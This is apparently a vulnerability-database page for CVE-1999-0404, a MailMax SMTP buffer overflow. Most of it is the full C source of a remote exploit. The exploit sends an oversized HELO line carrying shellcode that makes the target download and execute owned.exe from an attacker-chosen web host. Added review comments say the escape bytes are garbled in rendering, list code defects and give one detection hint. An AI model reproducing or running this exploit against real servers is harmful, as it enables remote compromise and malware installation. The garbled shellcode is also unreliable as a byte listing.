SmartMax MailMax SMTP缓冲区溢出漏洞

SmartMax MailMax SMTP缓冲区溢出漏洞

漏洞ID 1105414 漏洞类型 未知
发布时间 1999-02-13 更新时间 2005-05-02
CVE编号 CVE-1999-0404
CNNVD-ID CNNVD-199902-026
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/20600
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199902-026
|漏洞详情
Smartmax MailMax 是一个 Windows 95/98/NT 环境下的 SMTP 服务器。其处理 SMTP 命令的函数存在缓冲区溢出漏洞。远程攻击者可以利用该漏洞以 SMTP 服务进程的权限执行任意指令。
|漏洞EXP
source: http://www.securityfocus.com/bid/2312/info

Smartmax MailMax is an email server for Windows 95/98/NT. It is vulnerable to buffer overflow attacks against the SMTP-command processing function. This can be exploited to execute arbitrary commands with the privileges of the SMTP process. 

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>

/* Mail-Max Remote Exploit by _mcp_ <[email protected]>
This program must be run under x86 Linux

Greets go out to: Morpheus, Killspree, Coolg, Dregvant, Vio,
Wrl, #finite, #win32asm and anyone I may have missed, you know
who you are :).

You can reach me on efnet.

No greets go out to etl.

*/

/* Payload bytes that main() copies into the HELO line after the return
   address.  NOTE(review): the byte-escape backslashes appear to have been
   lost in this page's rendering, so as listed these are plain ASCII
   strings rather than the byte values the author intended; the listing is
   kept exactly as rendered. */
char code[] =
"xEBx45xEBx20x5BxFCx33xC9xB1x82x8BxF3x80x2Bx1"
"x43xE2xFAx8BxFBxE8xE9xFFxFFxFFxE8xE4xFFxFFxFF"
"xEBx29x46x58xFFxE0xBBx40xA5x1x10x56xFFx13x8B"
"xE8x46x33xC0x3Ax6x75xF9x46x40x3Ax6x74xE5x56"
"x55xBBx54xA5x1x10xFFx13xABxEBxE7xEBx4Fx33xC9"
"x66x49xC1xC1x2x51x33xC0x51x50xFFx57xE8x8BxE8"
"x33xC9x51x51x51x51x57xFFx57xF4x33xC9x51x51x51"
"x51x56x50xFFx57xF8x59x57x51x55x50xFFx57xFCx83"
"xC6x7x33xC9x51x56xFFx57xDCxFFx37x55x50x8BxE8"
"xFFx57xE0x55xFFx57xE4x33xC9x51x56xFFx57xECxFF"
"x57xF0xE8x67xFFxFFxFFx4Cx46x53x4Fx46x4Dx34x33"
"x1x60x6Dx64x73x66x62x75x1x60x6Dx78x73x6Ax75"
"x66x1x60x6Dx64x6Dx70x74x66x1x48x6Dx70x63x62"
"x6Dx42x6Dx6Dx70x64x1x58x6Ax6Fx46x79x66x64x1"
"x46x79x6Ax75x51x73x70x64x66x74x74x1x2x58x4A"
"x4Fx4Ax4Fx46x55x1x4Ax6Fx75x66x73x6Fx66x75x50"
"x71x66x6Fx42x1x4Ax6Fx75x66x73x6Fx66x75x50x71"
"x66x6Fx56x73x6Dx42x1x4Ax6Fx75x66x73x6Fx66x75"
"x53x66x62x65x47x6Ax6Dx66x1x2x69x75x75x71x3B"
"x30x30x00";

    /* Path string appended after the http host at the end of the HELO
       line.  Per the author it is "/~pw/owned.exe" stored with a per-byte
       +1 shift -- the same shift main() applies to argv[2] before sending.
       Same rendering caveat as code[] above: escapes shown without
       backslashes. */
char dir[] = "x30x7fx71x78x30x70x78x6fx66x65x2Fx66x79x66x1x0";


/* Resolve hostname to an IPv4 address in network byte order.
   On failure it prints a message and exits the process (status 0), so
   callers never see an error return.
   NOTE(review): copies h_length bytes into a 4-byte unsigned int without
   checking h_length; relies on implicit declarations of exit() and
   bcopy() (no <stdlib.h> / <strings.h> included), which C99 and later
   reject; the trailing "n" in the message is probably a "\n" whose
   backslash was lost in rendering. */
unsigned int getip(char *hostname)
  {
  struct hostent *hostinfo;
  unsigned int binip;

  hostinfo = gethostbyname(hostname);

  if(!hostinfo)
    {
      printf("cant find: %sn",hostname);
      exit(0);
    }
  bcopy(hostinfo -> h_addr, (char  *)&binip, hostinfo -> h_length);   /* unchecked length copy into a 4-byte int */
  return(binip);
  }


/* Print the usage text and terminate with exit(0).
   Declared int but never returns; main() ignores the return value and
   relies on the exit() to stop execution.  The "n" ending each string is
   almost certainly a "\n" whose backslash was lost in rendering. */
int usages(char *fname)
{						
      printf("Remote Mail-Max exploit v1.0 by _mcp_ <[email protected]>.n");
      printf("Usages: n");
      printf("%s <target host> <http site> <offset> <return address>n",
fname);
      printf("All known versions offset = 539, Return address = 79887315n");
      printf("Will make target download, save, and execute http://<http site>/~pw/owned.exen");

exit(0);   /* never returns to the caller */

}


/* Entry point.  argv: <target host> <http site> <offset> <return address>.
   Builds one oversized SMTP "HELO " line in buffer[] -- 0x90 filler, the
   caller-supplied return address, the code[] payload, the shifted http
   site string and dir[] -- connects to TCP port 25 on the target and
   writes it once.
   Defender's note: a HELO argument thousands of bytes long and consisting
   mostly of 0x90 is never produced by a legitimate client and is easy to
   match in SMTP server logs or an IDS rule.
   NOTE(review): implicit int return type (pre-C99 only); strlen/strcpy/
   memset/memcpy/strstr and atoi/atol/exit are used without <string.h> and
   <stdlib.h>; socket() and write() results are unchecked; several locals
   are unused. */
main (int argc, char *argv[])
{
  int sock,filedesc,offset,targethost,sinlen,codelength;   /* filedesc, codelength unused */
  struct sockaddr_in sin;
  unsigned char buffer[8000];
  char ipbuffer[16];   /* unused */
  unsigned char *ptr,*ptr2;
  unsigned long ret_addr;
  int len,x = 1;
  unsigned long address;   /* unused */

  if (argc < 5) usages(argv[0]);   /* usages() calls exit(), so argv[1..4] exist below */

  targethost = getip(argv[1]);   /* exits on resolution failure */


   len = strlen(argv[2]);
    if (len > 60)   /* http site string is limited to 60 bytes */
     {
       printf("Bad http format!n");
       usages(argv[0]);
     }

   ptr = argv[2];
   while (x <= len)   /* add 1 to every byte of argv[2]; dir[] is stored with the same shift */
      {
        x++;
        (*ptr)++;           /*Encrypt the http ip for later parsing */
        ptr++;
      }

  offset = atoi(argv[3]);   /* atoi/atol report no error for malformed input */
  ret_addr = atol(argv[4]);

  if (offset > 7000)   /* upper bound matches the memset() filler size below */
     {

       printf("Offset too large.n");
       exit(0);
     }

  sock = socket(AF_INET,SOCK_STREAM,0);   /* not checked for -1 */

  sin.sin_family = AF_INET;
  sin.sin_addr.s_addr = targethost;   /* already network byte order from getip() */
  sin.sin_port = htons(25);
  sinlen = sizeof(sin);


  printf("Starting to create the eggn");
  ptr = (char *)&buffer;   /* &buffer is a pointer to the whole array; the cast hides the type mismatch */
  strcpy(ptr,"HELO ");
  ptr+=5;

  memset((void *)ptr, 0x90, 7000);   /* filler after "HELO " */

  ptr+=offset;
  memcpy ((void *) ptr,(void *)&ret_addr, 4);   /* first 4 bytes of ret_addr in host order; author targets 32-bit x86 Linux (see header) */
  ptr+=60;
  memcpy((void *) ptr,(void *)&code,strlen(code));   /* payload without its NUL terminator */


  (char *) ptr2 = strstr(ptr,"xb1");   /* cast-as-lvalue: old GCC extension, not standard C */
  if (ptr2 == NULL)
     {
       printf("Bad shell coden");
       exit(0);
     }
  ptr2++;
  (*ptr2)+= len + ( sizeof(dir) - 1 );   /* adjust a byte inside the copied payload by the length of the strings appended below */

   (char *) ptr2 = strstr(ptr,"x83xc6");   /* same cast-as-lvalue extension */
     if (ptr2 == NULL)
      {
        printf("Bad shell coden");
        exit(0);

      }

  ptr2+= 2;

  (*ptr2)+= len + 8;   /* second in-payload adjustment, also derived from len */

  ptr+=strlen(code);
  memcpy((void *) ptr, (void *) argv[2], len);   /* append the shifted http site string */
  ptr+=len;
  memcpy((void *) ptr,(void*) &dir, sizeof(dir) );   /* dir[] including its terminator; the first NUL in buffer ends the strlen() below */
  printf("Made the eggn");

    if ( connect(sock, (struct sockaddr *)&sin, sinlen) == -1)
     {
       perror("error:");
       exit(0);
     }
    printf("Connected.n");

    write(sock, &buffer, strlen((char *)&buffer) );   /* single unchecked write; a short write sends a truncated line */
    write(sock,"rn",2);   /* intended CRLF; as rendered the literal is "rn" */
    sleep(1);
    printf("Sent the eggn");
   close(sock);
   exit(1);   /* exits with status 1 even on success */
}
|参考资料
Vulnerable software and versions: Configuration 1 — OR — *cpe:/a:smartmax_software:mailmax (* denotes vulnerable software). Changes related to vulnerability configurations. Technical Details: Vulnerability Type (View All). CVE Standard Vulnerability Entry: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0404

